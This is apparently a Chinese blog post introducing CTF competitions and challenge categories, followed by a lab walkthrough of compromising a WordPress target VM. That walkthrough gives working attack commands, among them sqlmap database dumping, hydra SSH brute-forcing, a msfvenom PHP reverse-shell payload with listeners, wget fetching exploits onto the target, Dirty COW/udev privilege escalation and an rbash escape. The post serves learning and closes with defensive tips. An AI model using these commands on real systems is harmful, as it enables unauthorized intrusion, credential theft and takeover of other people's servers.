• 什么是CTF


    本文是对入门学习的一些概念了解和一些常规场景记录

    1.CTF(capture the flag)是夺旗赛的意思。

    是网络安全技术人员之间进行攻防的比赛。
    起源1996年DEFCON全球黑客大会,替代之前真实攻击的技术比拼。
    (DEFCON极客大会诞生1993,每年7月在拉斯维加斯举行) 有黑客比赛的世界杯的说法。 CTF竞赛已成为安全圈最流行竞赛模式。

    国际知名赛事

    DEFCON CTF:CTF赛事中的“世界杯”
    UCSB iCTF:来自UCSB的面向世界高校的CTF
    Plaid CTF:包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛 
    Boston Key Party:近年来崛起的在线解题赛 Codegate CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元 Secuinside CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元 XXC3 CTF:欧洲历史最悠久CCC黑客大会举办的CTF

    国内知名赛事

    XCTF联赛:是国内最权威、最高技术水平与最大影响力的网络安全CTF赛事平台。
    (国内,亚洲最大竞赛。清华蓝莲花战队发起) 强网杯:国家级安全比赛,网信办网络安全协调局指导。 红帽杯:广东公安厅,计算机网络安全协会举办 AliCTF:阿里 TCTF:腾讯 BCTF:百度 WCTF:世界大赛邀请制,
    360 HCTF:杭州电子科技大学信息安全协会 ISCC:全国大学生,北理工

    2.竞赛模式:

    1.解题模式(jeopardy风险,危险)

    通常是线上参与,网络安全技术的题目。
    题目包含:逆向,漏洞挖掘和利用,web渗透,密码,取证,隐写,安全编程等类型。

     2.攻防模式(attack&defense)

    互相攻击防守,挖掘漏洞攻击和修复漏洞防守。

    3.混杂模式(mix)

    解题和攻防模式结合,典型赛事iCTF。

    3.题目类型

    3.1.reverse(逆向)

    涉及逆向分析能力:软件逆向,破解技术,反汇编和反编译技术。
    知识:汇编语言,加解密,反编译工具等。

    3.2.Pwn(破解)

    pwn发音砰,破解的意思,主要溢出漏洞(堆和栈溢出等)。
    涉及对二进制漏洞挖掘和利用能力。
    知识:c/c++,OD+IDA,数据结构,操作系统,汇编原理。
    (CE(CheatEngine)用来定位数据,OD(ollydbg)用来动态调试,IDA(Interactive Disassembler)用来看代码)

    3.3.web(web安全)

    web站点漏洞挖掘和利用:XSS,文件包含,代码执行,上传漏洞,sql注入等。
    以及数据包的构造和响应,tcp/ip协议。
    知识:PHP,JSP, JAVA, Python,TCP/IP,SQL,OWASP TOP 10

    3.4.crypto(加解密)

    涉及密码学相关技术,加解密技术,编码解码技术。
    知识:数论,矩阵,密码学。

    3.5.misc(杂项)

    安全相关:信息收集,隐写,流量分析,数字取证,编码转换。
    知识:隐写术,wireshark流量分析审查等工具使用,编码。

    3.6.mobile(移动)

    涉及APP漏洞挖掘和利用:iPhone和Android系统,以Android的apk破解为主。
    知识:Android 

    4.学习建议:

    可以刷题或者靶机练习,以web安全作为学习入口是不错选择。

    XCTF(攻防世界)
    Bugku CTF  
    Jarvis OJ  
    ctf.show 
    BUUCTF  
    CTFHub  

     词汇简介:POC,EXP,CVE,CVSS

    POC(Proof of Concept)
    漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在
    
    EXP(Exploit)
    漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本)
    
    0DAY
    含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。
    
    CVE(Common Vulnerabilities & Exposures)
    公共漏洞和暴露,信息安全漏洞公共的名称。
    使用一个共同的名字,可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题 。

    5.靶机实战:拿下wordpress提权

    测试环境:

    kali攻击机和WordPress系统的靶机。
    WordPress是一款个人博客框架属于内容管理系统(CMS)使用PHP语言和mysql数据库架设。

    攻击过程:

    信息收集,漏洞挖掘,漏洞利用,权限提升。

    5.1.信息收集

    包括:主机,ip,端口,服务,操作系统,目录等扫描收集及社工。
    1.主机发现工具:arp-scan netdiscover fping等。
    arp-scan -l //局域网扫描
    netdiscover -i eth0 -r 192.168.133.0/24 //网段扫描
    通过mac地址得到厂商。
    
    2.端口扫描工具:nmap
    -A:全面探测(aggressive(进攻性)) -sS:SYN扫描(半连接) -sV:显示版本 -v:显示vebose详细过程 
    -p-:全端口(1-65535) -T4:延迟级别,放弃超时10ms
    nmap -sS -sV -v -p- -T4  192.168.12.1
    nmap -A ip
    nmap -A -sS -sV -v -p- -T4  192.168.12.1
    
    常见端口和服务:
    22:ssh 25:smtp 80:http 111:RPCINFO服务 443:HTTPS服务
    624:PRC 3306:MYSQL
    
    
    3.信息收集目标就是威胁建模
    (简单来说就是猜测服务可能存在攻击方式和漏洞)
    对于web服务主要收集:服务和系统的名称和版本。
    可以利用谷歌浏览器Wappalyzer插件收集:系统和服务的版本信息
    WordPress版本,操作系统,数据库类型,PHP版本
    
    web地址的参数或者表单验证是否可sql注入,
    一般首页是没有参数的,选择注册页或者可传参数的页面
    比如xx
    ?id=1 后面加个冒号:xxx?id=1' 后面加 and 1=1 后者and 1=2:id=1 and 1=1 或者id=1 and 1=2
    and sleep(5)
    根据响应页面的内容对比判断是否存在注入点。 一般使用工具sqlmap更方便 ssh尝试弱口令爆破 工具:九头蛇 美杜莎 4.目录扫描:dirb,dirbuster,gobuster,御剑等工具。nikto。 对于web目录扫描是关键步骤,甚至首步骤。 作用:敏感目录和敏感文件可能泄露(管理页面,遗留文件)。

     发现管理后台,数据库管理页面。

    5.2.漏洞挖掘

    几种方式:
    1.对于管理后台尝试:
    弱口令(默认密码,常用密码),
    暴力破解(工具:burp爆破,PHPmyadmin爆破)。
    比如phpmyadmin(数据库网页管理工具的主页)
    
    2.链接的参数注入
    工具:sqlmap参数:-u:url --dbs:爆破数据库 -D:指定数据库 --tables:爆破数据表 -T:指定表 --columns:爆破字段 -C:指定字段(可多个) --dump :脱库
    sql注入检测:sqlmap -u "http://xxx?id=1" 
    得到数据库,web服务器,操作系统类型和版本以及具体库
    sql注入检测:sqlmap -u "http://xxx?id=1"  --dbs
    得到哪些库
    sqlmap -u "xxx?id=1" --dbs -D xx --tables
    得到爆破xx库的表
    sqlmap -u "xxx?id=1" --dbs -D xx --tables -T xx --columns
    得到爆破的字段
    sqlmap -u "xxx?id=1" --dbs -D xx --tables -C xx,xx,xx --dump
    得到爆破字段的内容
    
    有时需要cookie(登陆后)才能sqlmap扫描参数:
    获取cookie:浏览器开发者网络查看或者控制台(输入document.cookie获取)
    sqlmap -u "http://xxx?id=1" -p id --cookie="xxx=xxxxxxxx" --dbs
    
    通过爆破可能得到账号和密码,如果服务支持ssh,可以尝试连接
    >ssh xx用户@ipxxxx
    >密码xxx
    (制作密码字典工具以及破解:crunch ;hydra 。
    比如:crunch 8 8 -t admin%%@@ -o dic.txt //8 8:最小8位最大八位 -t:占位符 %数字 @小写字母 -o:输出文件 暴力破解ssh:
    hydra -l guest -P dic.txt xx.xx.ip ssh
    3.网页前端源码查看 是否只是前端验证。 4.nikto可对web服务器全面漏洞扫描:服务器cgi和项目及配置等 cgi通用网关接口:网页原本是静态的,通过cgi脚本进行处理生成页面返回给浏览器形成动态交互网页,类似servelet。 有时候指服务器,有时候 指cgi语言。 nikto -h http://xxx 得到一些敏感目录和文件,比如源码b备份,sql等 分析源码获得漏洞,获取管理员账号等

    拿到网站管理员权限:密码破解获得数据库管理权限以及后台管理员

    5.3.漏洞利用

    1.利用MSF生成反弹shell(木马)
    msfvenom -p php/meterpreter/reverse_tcp LHOST=自己主机ip LPORT=4444 -o Desktop/shell.php
    生成php网页木马,让目标连接自己主机
    kali自带php马:/usr/share/webshells/php/php-reverse-sell.php
    
    2.上传马
    将马页面放到php执行目录,或者写入可执行某个页面。
    
    3.监听原先木马设置端口以建立链接
    几种方式:
    1)netcat工具:类似工具:中国菜刀
    nc -nlvp 4444
    2)msf
    msf>use exploit/multi/handler
    >set playload php/meterpreter_reverse_tcp
    >set lhost ip
    >exploit
    执行后会形成一个会话session,ctr+c可退出,
    输入:session 1进入会话:
    meterpreter>
    
    linux查看监听:netstat -tunlp
    
    4.得到shell
    访问马页面,监听程序得到反弹shell.
    此时这个shell是web服务器的权限也就是Apache服务器权限。
    whoami ;查看当前权限
    uname -a : 查看linux系统内核版本
    
    如果使用msf监听那么执行exploit,连接建立后会得到shell
    meterpreter>
    输入:sysinfo 查看系统版本信息,
    输入:shell 生成交互shell
    还可以切换不同样式的shell:交互更友好:
    python -c 'import pty;pty.spawn("/bin/bash")'
    (common shell和 meterpreter shell区分
    有些连接得到是common shell 使用ctr+z 
    然后:y 让当前shell隐藏回到msf界面,
    使用session -l :查看所有会话shell,每个会话有个id。
    session -u 某id:将某会话从common变成meterpreter
    session -i 某id :进入某id会话
    )
    
    
    5.权限提升,获取root权限
    1).漏洞脏牛(dirty cow,CVE-2016-5195)对Linux内核>=2.6.22版本(2007年发布)本地提权,直到2016.10才修复。
    原理:内核的内存子系统在处理写入复制时(copy-on-write)产生了竞争条件,利用执行顺序异常,对只读内存映射进行写入,获得root权限。
    github官方提供exp
    2).漏洞udev(cve2009-1185 linux2.6的一个提权漏洞)
    searchsploit linux udev (漏洞库搜索udev漏洞的exp)
    /usr/share/exploitdb/platforms/linux/local/8478.sh
    
    exp在靶机执行需要先获取执行文件,还的添加执行权限。
    提供一个传送地址的几种方式:
    1).sh放在/tmp下,并执行:python -m SimpleHTTPServer 80
    目标主机获取:wget http://xx/xx.sh
    查看进程:cat /proc/net/netlink 
    在特定进程执行udev
    
    思路:知道漏洞,找到漏洞exp。

    补充:低权限rbash提升(绕过)

    当用guest用户登陆系统:ssh gust@xx.xx.xx.ip
    得到的shell可能权限非常低很多命令不能使用
    当前是rbash解析命令:
    echo $PATH:查看当前path。
    输出:/home/guest/prog
    输入命令会先到path目录下查找,存在才会直接执行,否则需要输入全路径才行执行。
    
    echo $PATH/*:查看可以直接执行的命令
    输出:/home/guest/prog/vi
    即表面可以直接执行vi。
    进入vi:
    :!/bin/bash //!在命令前面表示调用外部命令,在命令后面(wq!)表示强制执行。
    执行后命令使用bash来解析。
    (sudo以管理员运行,su切换用户,sudo su 切换到管理员)
    执行sudo su 显示找不到命令sudo
    某目录查找命令:
    ls -la /bin/sudo
    ls -la /sbin/sudo
    ls -la /usr/bin/sudo //确定sudo位置
    修改环境变量:
    export PATH=$PATH:/usr/bin/sudo
    查看当前path:
    echo $paht
    查找将su命令路径添加到环境:
    ls -la /bin/su //确认位置
    修改path:
    export PATH=$PATH:/bin/su
    接下可以执行:sudo su(需要有密码)

    5.4.如何防御:

    1.关闭多余端口,最小原则。
    2.使用cms等系统,修改默认后台路径。
    3.数据管理PHPmyadmin修改默认路径和密码。
    4.升级操作系统版本,及时打补丁修复漏洞。
    5.关注最新漏洞情报,提升安全运维响应能力。
  • 相关阅读:
    CSS资料:IE8 CSS hack
    作为前端制作师你必须知道的事情!
    TABLE的1PT边框
    IE6 png图片的支持
    开源公司IronTec将推动PHP进驻Android平台
    终于解决了FLASH 播放器的问题了
    Windows7 添加快速启动栏
    不能调试存储过程的解决方法
    给Asp.Net Forums的后台管理菜单做一个树形外衣
    Asp.net Forums与Cnforums研究文章集合
  • 原文地址:https://www.cnblogs.com/straybirds/p/16648268.html
Copyright © 2020-2023  润新知